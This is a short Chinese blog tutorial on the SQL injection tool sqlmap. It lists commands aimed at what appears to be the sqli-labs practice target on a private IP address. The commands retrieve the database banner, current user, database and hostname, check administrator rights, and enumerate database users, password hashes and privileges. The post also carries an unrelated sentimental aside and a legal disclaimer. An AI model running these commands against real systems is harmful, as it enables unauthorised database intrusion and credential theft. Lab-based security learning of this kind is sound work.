注入工具 -- sqlmap(检索DBMS信息)
其他
2020-01-24 12:57:17
阅读次数: 0
自从你删了我以后,我看了一年五个月的资料,时隔一年五个月,你突然出现在我的访客里,我呆坐了一夜,笑着哭,哭着笑,瞒着所有人我还是很喜欢你。。。
一、sqlmap检索DBMS Banner
–banner或者-b
sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” -b
二、sqlmap检索DBMS当前用户
sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --current-user
三、sqlmap检索DBMS当前数据库
sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --current-db
四、sqlmap检索DBMS当前主机名
sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --hostname
五、sqlmap探测当前用户是否是数据库管理员
sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --is-dba
六、枚举DBMS用户
sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --user
七、枚举DBMS用户密码
sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --password
八、枚举DBMS权限
sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --role
sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --privileges
禁止非法,后果自负
欢迎大家关注公众号:web安全工具库
发布了82 篇原创文章 ·
获赞 0 ·
访问量 1392
转载自blog.csdn.net/weixin_41489908/article/details/103626358
